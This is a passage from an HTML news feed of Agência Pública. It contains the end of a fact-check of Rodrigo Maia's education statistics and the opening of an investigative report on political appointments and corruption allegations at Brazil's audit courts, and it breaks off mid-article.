etária frequentavam creches ou unidades educacionais equivalentes em 2017</a>. Em 2016, eram 30,4%.</p><p>O <a href="http://pne.mec.gov.br/images/pdf/pne_conhecendo_20_metas.pdf">Plano Nacional de Educação</a> (PNE) foi criado para ampliar o acesso à educação no país e estabelece metas para serem cumpridas em dez anos a partir de 2014. A primeira é relacionada ao ensino infantil e prevê a ampliação da “oferta de educação infantil em creches, de forma a atender, no mínimo, 50% (cinquenta por cento) das crianças de até 3 anos até 2024”.</p><p><!-- alsoRead -->Os números mostram que o atendimento tem crescido ao longo dos anos, mas ainda está distante da meta. O <a href="http://portal.inep.gov.br/informacao-da-publicacao/-/asset_publisher/6JYIsGMAMkW1/document/id/1476034">Relatório de Monitoramento das Metas do PNE</a> – que usa dados do <a href="http://portal.inep.gov.br/web/guest/sinopses-estatisticas-da-educacao-basica">Censo Escolar, realizado pelo Instituto Nacional de Estudos e Pesquisas Educacionais</a> (Inep), e do IBGE – informa que, de 2004 para 2015, a parcela de crianças de 0 a 3 anos com acesso à creche ou à escola aumentou 13,1 pontos porcentuais, atingindo 30,4% em 2015. Em 2016, o número chegou a 31,9%. Os resultados estão próximos dos da Pnad Contínua, apesar de usarem outra metodologia.</p><p>O dado citado por Maia vem da <a href="https://biblioteca.ibge.gov.br/visualizacao/livros/liv98965.pdf">Síntese dos Indicadores Sociais de 2016</a>, do IBGE, que usa a Pnad 2015. O documento diz que apenas 25,6% das crianças com menos de 4 anos eram matriculadas em creches ou escolas naquele ano. O suplemento <a href="https://biblioteca.ibge.gov.br/visualizacao/livros/liv100137.pdf">Aspectos dos cuidados das crianças de menos de 4 anos de idade</a> informa que, de 10,3 milhões de crianças nessa faixa etária, apenas 2,6 milhões tinham acesso à creche. Os dados, no entanto, estão desatualizados. A Pnad foi encerrada em 2016. Foi substituída pela Pnad Contínua, que teve a metodologia revista e atualizada e traz diferenças na amostra, abrangência geográfica e periodicidade.</p><p>O número de crianças em creches apresentado pela Pnad 2015 (25,6%) é diferente do apresentado pelo relatório das metas do PNE (30,4%). Isso porque cada levantamento tem uma metodologia distinta. O primeiro foi feito com base em uma amostra da população, enquanto o segundo é feito cruzando dados do Censo Educacional, que é uma pesquisa declaratória feita somente a instituições de ensino e estudantes, com os dados do IBGE.</p><hr /><p><strong><a id="checagem3"></a>“Os 40% dos brasileiros que ganham mais têm 65% das vagas das universidades públicas. Isso é uma distorção.”</strong></p><p><img class="size-full wp-image-30745 alignleft" src="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg" alt="Sem contexto" width="400" height="400" srcset="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg 400w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-150x150.jpg 150w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-300x300.jpg 300w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-240x240.jpg 240w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-32x32.jpg 32w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-50x50.jpg 50w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-64x64.jpg 64w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-96x96.jpg 96w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-128x128.jpg 128w" sizes="(max-width: 400px) 100vw, 400px" /></p><p>Ao propor reformas estruturais que diminuiriam o peso do Estado no orçamento federal, Rodrigo Maia fez diversas críticas às universidades públicas brasileiras. Para ele, é uma distorção que a parcela correspondente aos 40% mais ricos no país ocupem 65% das vagas das universidades públicas. Procurado, o pré-candidato não informou qual foi a fonte usada. O mesmo dado aparece no <a href="http://documents.worldbank.org/curated/en/884871511196609355/pdf/121480-REVISED-PORTUGUESE-Brazil-Public-Expenditure-Review-Overview-Portuguese-Final-revised.pdf">estudo “Um Ajuste Justo: Análise da eficiência e equidade do gasto público no Brasil”</a>, um relatório do Banco Mundial publicado em novembro de 2017. O número está correto, mas falta contexto à frase.</p><p>Em 2015, o rendimento domiciliar médio per capita no grupo dos 40% mais ricos do Brasil era de R$ 1.057, de acordo com a Pnad 2015 – valor pouco maior do que um salário mínimo, atualmente em R$ 954. Trata-se, portanto, de uma parcela populacional que, apesar de ganhar mais do que a maioria da população, não possui necessariamente uma renda alta. A pesquisa do IBGE é a mesma utilizada nos cálculos do Banco Mundial.</p><p>Segundo a Pnad, a renda média per capita só fica acima de R$ 2 mil no grupo dos 10% mais ricos. Nessa parcela, a renda média é de R$ 5.231 por pessoa. Nos 20% mais ricos, a renda média ainda é de R$ 1.947 e, nos 30% mais ricos, a média fica em R$ 1.375 por pessoa. Além disso, outro estudo mostra que a participação de estudantes com renda familiar acima de nove salários mínimos está caindo, enquanto a parcela com rendimento de até três salários mínimos aumenta.</p><p>O estudo do Banco Mundial propõe a adoção de um modelo similar ao do Fundo de Financiamento Estudantil (Fies) para parte dos alunos das universidades públicas e discute também os gastos com educação superior no país. Na página 136 do documento, a instituição atesta que, em 2002, nenhum estudante universitário fazia parte dos 20% mais pobres da população e somente 4% integrava o grupo dos 40% mais pobres. “Em 2015, aproximadamente 15% dos estudantes do ensino superior estavam no grupo dos 40% mais pobres. No entanto, somente 20% dos estudantes fazem parte dos 40% mais pobres da população, ao passo que 65% integram o grupo dos 40% mais ricos”, calculou. Os números da instituição são baseados na Pnad, do IBGE, de 2015. Os dados levam em conta instituições públicas federais, estaduais e municipais e seus estudantes, com idades entre 18 e 24 anos.</p><p>Além de boa parte dos 40% que ganham mais não serem necessariamente ricos, como mostra a própria Pnad, a participação de estudantes de renda mais baixa está aumentando, enquanto cai a de alunos de renda mais elevada. Isso aparece na última <a href="http://www.andifes.org.br/wp-content/uploads/2017/11/Pesquisa-de-Perfil-dos-Graduanso-das-IFES_2014.pdf">Pesquisa do Perfil Socioeconômico dos Estudantes das Universidades Federais</a>, da Associação Nacional dos Dirigentes das Instituições Federais de Ensino Superior (Andifes), publicada em julho de 2016 com dados de 2014.</p><p>O estudo, apresentado no Fórum Nacional de Pró-Reitores de Assuntos Estudantis (Fonaprace), mostra que a parcela de estudantes provenientes de famílias com rendimento acima de nove salários mínimos caiu no período de 2010 a 2014, de 6,57% para 2,96%. Já a participação de alunos com rendimento familiar de até três salários mínimos atingiu mais de 51% do total de vagas. No Nordeste, eles são quase 64%, por conta de um aumento de mais de 14% em sua participação regional desde 2010, antes em cerca de 50%. Os dados da pesquisa foram obtidos por meio de questionários preenchidos por amostras de estudantes de universidades públicas federais.</p><hr /><p><strong><a id="checagem4"></a>“O custo [dos alunos] das universidades públicas é 2,5 vezes maior que [o] das universidades privadas.” </strong></p><p><img class="size-full wp-image-30745 alignleft" src="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg" alt="Sem contexto" width="400" height="400" srcset="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg 400w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-150x150.jpg 150w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-300x300.jpg 300w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-240x240.jpg 240w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-32x32.jpg 32w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-50x50.jpg 50w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-64x64.jpg 64w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-96x96.jpg 96w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-128x128.jpg 128w" sizes="(max-width: 400px) 100vw, 400px" />Ainda no trecho da sabatina em que discorre sobre os problemas do ensino superior no Brasil, Rodrigo Maia apresenta outro dado proveniente do mesmo <a href="http://documents.worldbank.org/curated/en/884871511196609355/pdf/121480-REVISED-PORTUGUESE-Brazil-Public-Expenditure-Review-Overview-Portuguese-Final-revised.pdf">estudo do Banco Mundial</a>. O documento atesta que “alunos nas universidades públicas brasileiras em média custam de duas a três vezes mais do que alunos matriculados em universidades privadas”. Embora a afirmação esteja correta, falta contexto.</p><p>As universidades públicas oferecem uma gama de cursos mais diversificada. Isso inclui muitas áreas com custo por aluno elevado, algumas delas desinteressantes economicamente para uma instituição privada. Além disso, a produção científica e a proporção de alunos de pós-graduação são muito maiores nas públicas, o que também contribui para o custo mais alto.</p><p>O gasto médio por aluno, se considerado todo o ensino superior brasileiro –ou seja, incluindo instituições públicas e privadas –, não é elevado segundo os critérios do Banco Mundial. As universidades e institutos federais, no entanto, fogem a essa regra. “Se considerarmos somente as instituições públicas, o nível de gasto por aluno é próximo ao verificado em países que possuem o dobro do PIB per capita do Brasil, e muito superior ao de vários países da Organização para a Cooperação e Desenvolvimento Econômico (OCDE), tais como Itália e Espanha”, calcula o relatório.</p><p>Em comparação com as universidades privadas, alunos nas universidades públicas brasileiras em média custam de duas a três vezes mais do que alunos matriculados em universidades privadas. O cálculo do Banco Mundial foi feito com base nas estatísticas do Exame Nacional de Desempenho dos Estudantes (Enade), no Censo da Educação Superior e em relatórios de gasto por aluno das universidades federais, elaborados pela Secretaria Executiva do Ministério da Educação (MEC).</p><p>O estudo, entretanto, não destaca as grandes diferenças entre o ensino superior público e o privado no Brasil. Em entrevista para o Jornal da Unicamp, Nelson Cardoso Amaral, professor do Programa de Pós-Graduação em Educação da Universidade Federal de Goiás (UFG), aponta que, <a href="https://www.unicamp.br/unicamp/ju/noticias/2017/11/30/relatorio-do-banco-mundial-distorce-dados-e-ignora-realidade-do-pais-alertam">ao calcular o gasto por aluno, o relatório do Banco Mundial soma todos os recursos financeiros aplicados na instituição – incluindo, por exemplo, gastos em pesquisa e extensão e os vencimentos de funcionários e professores na ativa e aposentados – e divide o total pelo número de matrículas</a>. Esse grande volume, ao se fazer o cálculo, gera um resultado maior no custo por aluno. Também entrevistado pelo jornal, o vice-presidente da Sociedade Brasileira para o Progresso da Ciência (SBPC), Carlos Roberto Jamil Cury, diz que é necessário levar em consideração o perfil de cada instituição para fazer comparações desse tipo. Entre os fatores que influenciam o custo por estudante estão a proporção de alunos em atividades de pós-graduação e as atividades de pesquisa científica produzidas.</p><p>Embora a rede privada seja responsável por 75% das matrículas do ensino superior, <a href="http://portal.inep.gov.br/censo-da-educacao-superior">de acordo com o Censo da Educação Superior do MEC</a>, todas as 20 instituições que lideram a produção científica brasileira são públicas, segundo um <a href="https://www.capes.gov.br/images/stories/download/diversos/17012018-CAPES-InCitesReport-Final.pdf">relatório encomendado pela Coordenação de Aperfeiçoamento de Pessoal de Nível Superior (Capes)</a>. O documento, divulgado em janeiro de 2018, foi produzido pela empresa estadunidense Clarivate Analytics e analisa a pesquisa científica no Brasil entre 2011 e 2016. A conclusão do estudo é que praticamente só há produção de pesquisa científica em universidades públicas no país.</p><p>A diversidade de <a href="https://www.unicamp.br/unicamp/ju/noticias/2017/11/30/relatorio-do-banco-mundial-distorce-dados-e-ignora-realidade-do-pais-alertam">cursos oferecidos também é maior na rede pública</a>. “Cursos caros e que exigem laboratórios bem equipados – como medicina e as engenharias – tendem a se concentrar no sistema público”, afirmou Renato Pedrosa, líder do Laboratório de Estudos sobre Ensino Superior da Unicamp, também entrevistado.</p><h3>Veja outras checagens dos presidenciáveis</h3><div id="freewall-1530382049-8686" class="freewall summaries mt-5 mb-5"><div class="brick card brick-category-1"> <a href='https://apublica.org/2018/05/truco-marina-silva-omite-processos-mas-acerta-sobre-meio-ambiente/'><img width="800" height="600" src="https://apublica.org/wp-content/uploads/2018/05/1014211-18042016-img_0119-1-800x600.jpg" class="card-img-top mb-2 wp-post-image" alt="" /></a><div class="card-body"><p class="card-text summary"><a href='https://apublica.org/2018/05/truco-marina-silva-omite-processos-mas-acerta-sobre-meio-ambiente/'>Marina Silva omite processos, mas acerta sobre meio ambiente</a></p></div></div><div class="brick card brick-category-1"> <a href='https://apublica.org/2018/04/truco-ao-falar-do-brasil-ciro-gomes-usa-dados-falsos-e-exagerados/'><img width="800" height="600" src="https://apublica.org/wp-content/uploads/2018/04/ciro-gomes-palestra-800x600.jpg" class="card-img-top mb-2 wp-post-image" alt="Ciro Gomes em palestra na UFABC, em 2017; no exterior, candidato citou dados falsos" /></a><div class="card-body"><p class="card-text summary"><a href='https://apublica.org/2018/04/truco-ao-falar-do-brasil-ciro-gomes-usa-dados-falsos-e-exagerados/'>Ao falar do Brasil, Ciro Gomes usa dados falsos e exagerados</a></p></div></div><div class="brick card brick-category-1"> <a href='https://apublica.org/2018/03/truco-em-8-frases-acertos-e-erros-de-geraldo-alckmin/'><img width="800" height="600" src="https://apublica.org/wp-content/uploads/2018/03/geraldo-alckmin-800x600.jpg" class="card-img-top mb-2 wp-post-image" alt="" srcset="https://apublica.org/wp-content/uploads/2018/03/geraldo-alckmin-800x600.jpg 800w, https://apublica.org/wp-content/uploads/2018/03/geraldo-alckmin-510x382.jpg 510w" sizes="(max-width: 800px) 100vw, 800px" /></a><div class="card-body"><p class="card-text summary"><a href='https://apublica.org/2018/03/truco-em-8-frases-acertos-e-erros-de-geraldo-alckmin/'>Em 8 frases, acertos e erros de Geraldo Alckmin</a></p></div></div></div> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/truco-rodrigo-maia-usa-dados-sem-contexto-sobre-educacao/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Quem fiscaliza os tribunais de contas?</title><link>https://apublica.org/2018/06/quem-fiscaliza-os-tribunais-de-contas/</link> <comments>https://apublica.org/2018/06/quem-fiscaliza-os-tribunais-de-contas/#respond</comments> <pubDate>Thu, 14 Jun 2018 16:56:01 +0000</pubDate> <dc:creator><![CDATA[Alice Maciel]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[corrupção]]></category> <category><![CDATA[lava-jato]]></category> <category><![CDATA[política]]></category> <category><![CDATA[TCU]]></category><guid isPermaLink="false">http://apublica.org/?p=47860</guid> <description><![CDATA[Abarrotados de denúncias de corrupção, TCEs são compostos de membros políticos nomeados pelos governadores e seus aliados]]></description> <content:encoded><![CDATA[<p><span style="font-weight: 400;">“As minhas contas foram aprovadas pelo Tribunal de Contas do Estado.” Essa frase está na ponta da língua dos políticos investigados na Operação Lava Jato por fraudar licitações e superfaturar obras. E o argumento não é falso. Os ex-governadores Aécio Neves (PSDB), de Minas Gerais, Sérgio Cabral (MDB), do Rio de Janeiro, e Beto Richa (PSDB), do Paraná – investigados por suspeita de terem favorecido empresas em licitações –, tiveram as contas aprovadas nos tribunais de contas de seus estados, colocando em xeque a credibilidade dos órgãos de controle como mecanismo para coibir esquemas de corrupção. </span></p><p><span style="font-weight: 400;">O problema é que, entre os julgadores das suas movimentações financeiras, estavam aliados políticos. </span><span style="font-weight: 400;">A ONG Transparência Brasil revelou, <a href="https://www.transparencia.org.br/downloads/publicacoes/TBrasil%20-%20Tribunais%20de%20Contas%202016.pdf" target="_blank" rel="noopener">em estudo</a></span><span style="font-weight: 400;"> </span><span style="font-weight: 400;">publicado no ano passado, que oito em cada dez conselheiros de contas do país exerceram mandatos eletivos ou altas funções em governos. A pesquisa, realizada em 2014 e atualizada em 2016, incluiu membros do Tribunal de Contas da União (TCU), dos 27 tribunais de contas dos estados e do Distrito Federal, e dos tribunais municipais. Existem quatro tribunais de contas do conjunto de municípios dos estados de Pará, Goiás, Ceará e Bahia, e Tribunais Municipais de contas nas cidades de São Paulo e Rio de Janeiro.</span><!-- alsoRead --></p><p><span style="font-weight: 400;"><a id="Link1"></a>O levantamento mostra que 23% dos 233 conselheiros e ministros respondem a processos ou já foram punidos na Justiça e até mesmo nos próprios tribunais de contas. Os supostos guardiões do dinheiro público são acusados de fraudar licitações, superfaturar obras e enriquecer ilicitamente. A mais comum acusação que recai sobre eles: improbidade administrativa.</span></p><p><span style="font-weight: 400;">Embora não tenha havido nenhuma investigação específica sobre elas, a Operação Lava Jato escancarou a participação dos integrantes dessas cortes estaduais, municipais e federal nos esquemas de desvio de dinheiro. No Rio de Janeiro, cinco conselheiros do TCE estão afastados, suspeitos de cobrar propina para fazer “vista grossa” de contratos do governo com empreiteiras. </span></p><p><span style="font-weight: 400;">Até fevereiro deste ano, o ex-ministro das cidades do governo de Dilma Rousseff Mário Negromonte (PP-BA) ocupava uma cadeira no conselho do Tribunal de Contas dos Municípios do Estado Bahia (TCM). Ele foi acusado de pedir propina de R$ 25 milhões para beneficiar empresas do setor de rastreamento de veículos quando era ministro. Indicado pelo ex-governador Jaques Wagner (PT-BA), em 2014, o conselheiro foi afastado depois que virou réu por corrupção passiva. </span><span style="font-weight: 400;">O senador Agripino Maia (DEM-RN) teria </span><span style="font-weight: 400;">influenciado a mudança de parecer do TCE do Rio Grande do Norte, favorecendo a OAS na construção do estádio Arena das Dunas para a Copa do Mundo de 2014, de acordo com denúncia da Procuradoria-Geral da República, acatada pelo Supremo Tribunal Federal (STF). A operação atingiu também a cúpula do TCU. O filho do ministro Aroldo Cedraz (ex-deputado federal da Bahia pelo PFL, hoje DEM), o advogado </span><span style="font-weight: 400;">Tiago Cedraz,</span><span style="font-weight: 400;"> passou a ser investigado em 2015 depois de o dono da empreiteira UTC Engenharia, Ricardo Pessoa, ter dito que o contratou para obter dados de difícil acesso na corte e para comprar uma decisão referente à usina nuclear Angra 3. Procurados pela reportagem da Pública, todos negam as acusações. </span><span style="font-weight: 400;">(<a href="http://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/" target="_blank" rel="noopener">Leia o que dizem os citados</a>)</span></p><h3><b>Tudo dominado </b></h3><p><span style="font-weight: 400;">Os tribunais de contas estaduais possuem sete conselheiros. Quatro são escolhidos pelo voto dos deputados; um, livremente pelo governador; e os outros dois, também pelo governador, mas têm de ser auditores e procuradores do Ministério Público de Contas. </span></p><p><span style="font-weight: 400;">Procurador do Ministério Público junto ao TCU e presidente da Associação Nacional do Ministério Público de Contas (Ampcon), Júlio Marcelo de Oliveira </span><span style="font-weight: 400;">–</span><span style="font-weight: 400;"> conhecido por ser o autor da representação que levou à reprovação das contas de 2014 da ex-presidente Dilma Rousseff (PT) por fraude fiscal </span><span style="font-weight: 400;">–</span><span style="font-weight: 400;">, alerta que, quanto mais tempo o mesmo grupo político permanece no poder de um estado, mais influência ele tem no tribunal de contas. </span></p><p><span style="font-weight: 400;">É o caso, por exemplo, de Minas Gerais. O PSDB permaneceu no governo por 12 anos, de janeiro de 2003 a janeiro de 2015. Todos os membros do órgão mineiro são ligados aos ex-governadores tucanos Aécio Neves e Antonio Anastasia: os ex-deputados Mauri Torres (PSDB), José Alves Viana (DEM), Wanderley Ávila (PSDB) e Sebastião Helvécio (PDT) foram indicados pela Assembleia Legislativa. Já os dois cargos técnicos, ocupados por Cláudio Terrão e Gilberto Pinto Dinis, foram nomeação de Anastasia. </span></p><p><span style="font-weight: 400;">O levantamento da ONG Transparência Brasil que avaliou a vida pregressa de todos os membros das cortes dos tribunais de contas na ativa em 2016 traz a informação de que, no grupo de conselheiros que jamais ocuparam cargo eletivo nem foram secretários de governo, 6% respondem a processo na Justiça. Já entre os conselheiros que são políticos profissionais, a porcentagem sobe para 27%. </span></p><p><span style="font-weight: 400;"><a id="Link2"></a>Políticos que perderam o mandato, que estão achando difícil se reeleger, ou que querem aumentar o poder político da família, sendo substituídos na Assembleia pelo filho ou mulher, por exemplo, cobiçam as vagas de conselheiros de contas. Ali, recebem diversos benefícios, como foro privilegiado, cargo vitalício, salários altos – o salário-base é de R$ 30.471 –, além de gratificações e outras vantagens. </span></p><p><span style="font-weight: 400;">Juntos, os tribunais de contas custam mais de R$ 10 bilhões aos cofres públicos, de acordo com o procurador Júlio Marcelo de Oliveira. </span><span style="font-weight: 400;">Os cargos de conselheiros são equivalentes aos dos desembargadores, e os ministros do TCU são equiparados pela Constituição Federal aos ministros do Supremo Tribunal de Justiça (STJ). Os membros dos órgãos de controle estão regidos pela Lei Orgânica da Magistratura. No entanto, ninguém os fiscaliza. “Os tribunais de contas não têm controle nenhum. Ninguém fiscaliza esses órgãos”, ressaltou </span><span style="font-weight: 400;">Oliveira</span><span style="font-weight: 400;">. </span></p><p><span style="font-weight: 400;">Em abril deste ano, vagou uma cadeira na corte de Minas, com a morte da conselheira Adriene Andrade, mulher do ex-senador Clésio Andrade (MDB). Ela preenchia a vaga de indicação livre do governador. Será a vez agora do atual gestor do estado, Fernando Pimentel (PT), indicar um nome. O líder do governo no Legislativo, deputado estadual Durval Ângelo, é o mais cotado a assumir o conselho, perpetuando a prática de aliados políticos fiscalizarem a prestação de contas de governadores. </span></p><p><span style="font-weight: 400;">Com interesses políticos predominando sobre interesses públicos, não faltam escândalos no currículo do TCE de Minas Gerais. Em 2002, o então presidente do órgão, José Ferraz, já falecido, foi apontado pelo Ministério Público do estado como um dos envolvidos em um incêndio criminoso que destruiu provas de investigações fiscais. Em 2008, três conselheiros, incluindo o presidente, foram indiciados por suspeita de envolvimento com uma organização criminosa acusada de ter desviado R$ 200 milhões em verbas do Fundo de Participação dos Municípios. O esquema foi revelado na Operação Pasárgada, que teve como alvo também membros da corte do Rio. Em 2015, <a href="https://www.em.com.br/app/noticia/politica/2015/03/04/interna_politica,623869/contracheques-nas-alturas.shtml" target="_blank" rel="noopener">o jornal </a></span><a href="https://www.em.com.br/app/noticia/politica/2015/03/04/interna_politica,623869/contracheques-nas-alturas.shtml"><i><span style="font-weight: 400;">Estado de Minas</span></i></a><span style="font-weight: 400;"><a href="https://www.em.com.br/app/noticia/politica/2015/03/04/interna_politica,623869/contracheques-nas-alturas.shtml"> revelou</a> que os conselheiros receberam, em dezembro de 2014, salários que ultrapassavam R$ 150 mil mensais</span><span style="font-weight: 400;">. </span></p><p><span style="font-weight: 400;">O Ministério Público chegou a questionar na Justiça, em 2006, a indicação de Adriene Andrade ao conselho da corte de contas, com o argumento de que ela não possuía os requisitos para preencher a vaga. Ela era ré em processos sob a acusação de fraudar licitações e respondia a ações cíveis e inquéritos policiais por supostas irregularidades administrativas quando foi prefeita de Três Pontas, de 2001 a 2004.</span></p><p><a href="https://apublica.org/2018/06/o-que-dizem-os-citados-na-reportagem/">Leia também: Veja o que dizem os mencionados na reportagem</a></p><h3><b>Sociedade civil fica de fora do TCE</b></h3><p><span style="font-weight: 400;">Para ser conselheiro do TCE de Minas, de acordo com artigo 78 da </span><span style="font-weight: 400;">Constituição</span><span style="font-weight: 400;"> mineira, que foi inspirada na brasileira – na qual há os critérios destinados aos ministros do TCU –, é preciso ter “mais de trinta e cinco e menos de sessenta e cinco anos de idade; possuir idoneidade moral e reputação ilibada; notórios conhecimentos jurídicos, contábeis, econômicos, financeiros ou de administração pública; e ter mais de dez anos de exercício de função ou de efetiva atividade profissional que exijam os conhecimentos</span><span style="font-weight: 400;"> mencionados no inciso anterior</span><span style="font-weight: 400;">”. </span></p><p><span style="font-weight: 400;">Doutor em contabilidade e finanças públicas, com mais de dez anos de serviço público, sendo quatro no TCE, o contador Alexandre Bossi encontrou na lei a possibilidade de fazer diferente: ocupar uma vaga de juiz de contas sendo um representante da sociedade civil. O desejo surgiu depois que ele trabalhou como auditor no tribunal mineiro. </span><span style="font-weight: 400;">“Eu me sentia muito incomodado. Como auditor concursado, como técnico, você levanta várias coisas, faz inspeção na rua, visita municípios, faz um trabalho técnico de qualidade, com levantamento de irregularidades, de má gestão. Quando chega para votação política, no plenário, muitas vezes aquilo que a gente pesquisava, pegando o que a lei estipula em termos de punição, era deixado de lado. Achávamos, por exemplo, alguma irregularidade muito grande em uma estatal, aí, ao invés de aplicar multa, aplicava ressalva. Ou seja, não funcionava”, lembrou Bossi. </span></p><p><span style="font-weight: 400;">Em 2000, com a morte de um conselheiro indicado pela Assembleia, Bossi decidiu candidatar-se. O percurso, descobriu, não era tão simples como parecia. De acordo com o regimento interno do Legislativo mineiro, para entrar na disputa por uma vaga na corte de contas, é preciso ter o apoio de 20% dos deputados estaduais. “</span><span style="font-weight: 400;">É feito para a sociedade não participar. É publicado no rodapé do </span><i><span style="font-weight: 400;">Diário Oficial</span></i><span style="font-weight: 400;"> e, quando abre a vaga, só tem dez dias para fazer o registro”, avaliou.</span></p> <figure id="attachment_47844" aria-describedby="figcaption_attachment_47844" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Tamás Bodolay/Agência Pública</div><img itemprop="contentURL" class="wp-image-47844 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Imagem03.jpg" alt="" width="1200" height="801" srcset="https://apublica.org/wp-content/uploads/2018/06/Imagem03.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/Imagem03-800x534.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></div><figcaption id="figcaption_attachment_47844" class="wp-caption-text caption" itemprop="description">Alexandre Bossi encontrou na lei a possibilidade de fazer diferente: ocupar uma vaga de juiz de contas sendo um representante da sociedade civil</figcaption></figure><p><span style="font-weight: 400;">Consultor do Legislativo desde 1993, ele tinha proximidade com os parlamentares e bateu na porta dos 77 gabinetes para conseguir os 16 votos necessários. Cada deputado pode apoiar até dois candidatos.</span><span style="font-weight: 400;"> “Os deputados falavam comigo: ‘Você tá doido? Já tenho compromisso com meu colega aqui, do partido tal’. Eu respondia: “Ô deputado, não diga isso. Diga que tem compromisso porque acredita que ele vai ser um bom fiscal, um bom auditor, mas não porque é seu amigo de partido”, lembrou. Bossi conseguiu o apoio e foi o primeiro representante da sociedade civil a disputar o cargo no país. Ele concorreu naquele ano com cinco deputados.</span></p><p><span style="font-weight: 400;">Na votação do plenário, Bossi precisaria de 39 votos, mas teve apenas um. Depois que experimentou a eleição pela primeira vez, o servidor público conseguiu entrar na disputa todas as outras cinco vezes em que vagaram cadeiras da Assembleia, em 2004, 2005, 2009, 2011 e 2012, sempre concorrendo com deputados. Ele até mesmo tentou ser o indicado do Aécio, em 2006. “Eu tentei falar com o governador, dizer pra ele para indicar uma pessoa com perfil técnico, mas o Aécio nem me recebeu. Foi o Anastasia, na época secretário de Estado, quem me atendeu”, contou. Naquele ano, Adriene Andrade foi a escolhida. </span></p><p><span style="font-weight: 400;">“Não vou me candidatar mais”, garantiu Bossi. “Eu fiquei de 2000 a 2012 mexendo com isso. É muito cansativo, eu paro a minha vida, mas isso não significa que eu desisti da luta”, explicou. Ele disse desconhecer casos de nomeações que não sejam políticas. “A sociedade civil organizada jamais conseguiu emplacar um nome. No caso da minha candidatura, eu tive a iniciativa, mas contei com o apoio de entidades como o Conselho Regional de Contabilidade e do Sindicato dos Servidores do Tribunal de Contas”. Para ele, é muito importante colocar os tribunais de contas, “órgãos desconhecidos da sociedade e tão importantes no combate à corrupção”, sempre na pauta de discussão. “Os diversos casos de desvio de dinheiro público que, com frequência, aparecem nas primeiras páginas dos jornais são prova de que os tribunais de contas não andam exercendo satisfatoriamente o seu papel fiscalizador”. </span></p><h3><b>Aprovada pelo TCE-MG, cidade administrativa cai na mira da Lava Jato</b></h3> <figure id="attachment_47855" aria-describedby="figcaption_attachment_47855" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Gustavo Baxter/Agência Pública</div><img itemprop="contentURL" class="wp-image-47855 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Imagem14.jpg" alt="" width="1200" height="800" srcset="https://apublica.org/wp-content/uploads/2018/06/Imagem14.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/Imagem14-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></div><figcaption id="figcaption_attachment_47855" class="wp-caption-text caption" itemprop="description">Cidade administrativa cai na mira da Operação Lava Jato</figcaption></figure><p><span style="font-weight: 400;">Na mira da Operação Lava Jato, a Cidade Administrativa da capital mineira passou pelo crivo do Tribunal de Contas de Minas em 2007. As suspeitas reveladas nas investigações da Polícia Federal (PF) são de que o então governador Aécio Neves tenha recebido da Odebrecht R$ 5,2 milhões em propina para que a empresa faturasse a licitação. Os recursos teriam ido para sua campanha, de acordo com a delação do ex-executivo da empreiteira Benedicto Júnior. Sempre que questionado sobre as acusações, <a href="https://noticias.uol.com.br/politica/ultimas-noticias/2017/04/12/aecio-recebeu-caixa-2-via-obra-da-cidade-administrativa-de-mg-diz-delator-da-odebrecht.htm" target="_blank" rel="noopener">Aécio Neves diz</a> que “o edital de licitação foi apresentado previamente ao Ministério Público Estadual e ao Tribunal de Contas do Estado”</span><span style="font-weight: 400;">. </span></p><p><span style="font-weight: 400;">Inaugurada em 4 de março de 2010, dia em que o avô de Aécio, o ex-presidente Tancredo Neves, completaria 100 anos, a Cidade Administrativa é a obra mais cara da gestão do tucano. Ela custou R$ 1,2 bilhão aos cofres públicos. Apesar do alto investimento, salta aos olhos de quem frequenta o local a infraestrutura já decadente: <a href="http://noticias.r7.com/brasil/noticias/recem-inaugurada-nova-sede-do-governo-de-minas-gerais-ja-apresenta-rachaduras-20100627.html" target="_blank" rel="noopener">pisos com rachaduras surgidas apenas três meses depois da inauguração</a> </span><span style="font-weight: 400;">, janelas proibidas de serem abertas – ficam lacradas – porque os vidros caem lá do alto e cheiro forte de esgoto nos jardins. Em 2015, u<a href="https://www.otempo.com.br/cidades/pr%C3%A9dio-fica-danificado-ap%C3%B3s-ventania-na-cidade-administrativa-1.1146366">m vendaval arrancou parte do teto do prédio</a></span><span style="font-weight: 400;">. </span></p><a href='https://apublica.org/janela-com-lacre-2/'><img width="1200" height="800" src="https://apublica.org/wp-content/uploads/2018/06/janela-com-lacre-2.jpg" class="attachment-full size-full" alt="" srcset="https://apublica.org/wp-content/uploads/2018/06/janela-com-lacre-2.jpg 1200w, https://apublica.org/wp-content/uploads/2018/06/janela-com-lacre-2-800x533.jpg 800w" sizes="(max-width: 1200px) 100vw, 1200px" /></a> 